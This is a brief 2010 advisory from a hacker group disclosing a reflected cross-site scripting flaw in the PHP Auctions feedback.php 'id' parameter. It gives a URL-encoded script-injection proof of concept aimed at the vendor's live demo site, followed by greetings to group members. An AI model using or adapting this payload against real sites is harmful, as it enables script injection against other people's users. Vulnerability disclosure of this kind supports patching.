PHP Auctions suffers from a cross site scripting vulnerability.
350da68cb039dbd530fc08d72a5ecba94e21f85eecb84bce7b296ddcd117446e
#############################################################################################################
## Tittle :PHPAUCTIONS XSS Vulnerabilities ##
## Author : SENOT (selalungantuk_exe@yahoo.com) ##
## Homepage : https://www.indonesiancoder.com ##
## Date : Thursday 04 March, 2010 ##
## Location : - INDONESIA - ##
#############################################################################################################
[+] INFO
[+] Name : PHPAUCTIONS
[+] Vendor : https://phpauctions.info/
[+] Vulnerability : XSS
[+] Dork : "Dork Just for newbie"
#############################################################################################################
[ Vulnerable File ]
[+] https://127.0.0.1[senot]/feedback.php?id=[INDONESIANCODER]
[ DEMO ]
[+] https://phpauctions.info/demo/feedback.php?id=29/%3E%22%3E%3Cscript%3Ealert%28123456789%29%3C/script%3E&faction=show
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER - ServerIsDown - IndonesianHacker - SoldierOfAllah
[+] kaMtiEz,Tukulesto,M3NW5,arianom,gonzhack,tucker,saint
[+] B4YU5154,nuxdtyals,qu1ck_51lv3r,Mr.J0k3R,brandal_666
[+] elv1n4,Mr.fribo,Jack,VycOd,x-shadow,bobyhikaru,deril0101
[+] ex girlfriend ( you Are my Spirit )
[+] And you
[ NOTES ]
[+] kaMtiEz for ayy . . u will be mine
[+] Get the codes and Feel the Soul ( INDONESIANCODER TEAM )